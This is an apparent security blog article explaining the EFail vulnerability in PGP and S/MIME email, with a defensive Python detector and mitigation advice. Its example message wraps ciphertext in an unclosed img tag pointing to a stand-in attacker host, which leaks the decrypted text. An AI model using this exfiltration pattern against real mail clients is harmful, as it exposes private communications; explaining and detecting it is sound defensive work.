
Secplicity - Security Simplified

Powered by WatchGuard Technologies

EFail, “No One is Safe Using Email”

June 7, 2018 By Trevor Collins


“Email is a plaintext communication medium whose communication paths are partly protected by TLS. For people in hostile environments (journalists, political activists, whistleblowers, …) who depend on the confidentiality of digital communication, this may not be enough.”

This is according to a researcher on the EFail website, who goes on to describe how this vulnerability exploits OpenPGP and S/MIME. Unless you are familiar with this type of encryption, it would be easy to assume that PGP is no longer safe. Some have gone a step further and recommended not using PGP at all. This is not necessarily good advice, as PGP is still secure. For some, TLS encryption is not enough to safeguard their emails, but for that to be the case you would have to distrust the email server you are using or the certificates on the server. Nation-state actors are one of the few groups, perhaps the only group, that would possibly be able to view an email when the server uses TLS, unless the server or client you are sending the email to is compromised. (Note: TLS is not compromised by EFail in any way.)

OpenPGP and S/MIME are vulnerable to EFail, and I am not trying to downplay this. Adding a hyperlink in the parts of the email that are not encrypted causes the encrypted part to be linked to a website. The email data would look like this:

 


Unencrypted content for routing email
-Encryption boundary-
Content-Type: text/html

<img src="https:// NationstateActor.com/

-Encryption boundary-

Content-Type: application/pkcs7-mime;
  smime-type=enveloped-data
Content-Transfer-Encoding: base64

75c753802038f7e7eb2f659217ebfd8e43c698cdd5e8e3d49aaa5fa3683f9000…

-Encryption boundary-

Content-Type: text/html

">

-Encryption boundary-

 

This creates an image that, when loaded in the email client, makes a request to https:// NationstateActor.com/SecretMessage, where SecretMessage stands for the decrypted content of the encrypted part.
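A defender-side check for the layout described above, as an added example that is not part of the original article: it flags an encrypted MIME part that directly follows an HTML part ending inside an unterminated tag. The sample message, the `collector.example` host and the function names are constructed for illustration.

```python
import email
from email import policy
ENCRYPTED = {"application/pkcs7-mime", "application/x-pkcs7-mime",
             "application/pgp-encrypted", "multipart/encrypted"}

# Constructed sample with the same layout as the message shown above.
SAMPLE = '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/html

<img src="https://collector.example/
--BOUNDARY
Content-Type: application/pkcs7-mime; smime-type=enveloped-data
Content-Transfer-Encoding: base64

Q09OU1RSVUNURUQ=
--BOUNDARY
Content-Type: text/html

">
--BOUNDARY--
'''

def ends_inside_tag(html):
    """True if the fragment stops inside an HTML tag or a quoted attribute value."""
    in_tag, quote = False, None
    for ch in html:
        if quote:
            quote = None if ch == quote else quote
        elif in_tag and ch in "\"'":
            quote = ch
        elif ch in "<>":
            in_tag = ch == "<"
    return in_tag

def find_wrapped_ciphertext(raw):
    """Return (index, content type) of encrypted parts that follow an unterminated HTML part."""
    findings = []
    for node in email.message_from_string(raw, policy=policy.default).walk():
        parts = list(node.iter_parts())
        for i in range(1, len(parts)):
            prev, part = parts[i - 1], parts[i]
            if (part.get_content_type() in ENCRYPTED
                    and prev.get_content_type() == "text/html"
                    and ends_inside_tag(prev.get_content())):
                findings.append((i, part.get_content_type()))
    return findings
```

A mail gateway or triage script could quarantine any message for which `find_wrapped_ciphertext` returns a non-empty list, since legitimately encrypted mail has no reason to place ciphertext after an unterminated HTML tag.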

If you have allowed external content in the email client, this attack is a concern. The email may be vulnerable if it matches these 4 criteria:

  • The email doesn’t use TLS, or you don’t trust the TLS email server
  • Uses PGP or S/MIME for encryption
  • Uses a client that is vulnerable
  • Enables HTML and allows external content to be loaded from the email

There is a vulnerability here that should be addressed and resolved by an update, but PGP is still secure and can be used to protect emails. If you do use PGP or S/MIME, we recommend you use an external application for decryption, update your client when possible, and be cautious of emails you receive that have external content. –Trevor Collins


Filed Under: Editorial Articles Tagged With: Software vulnerabilities
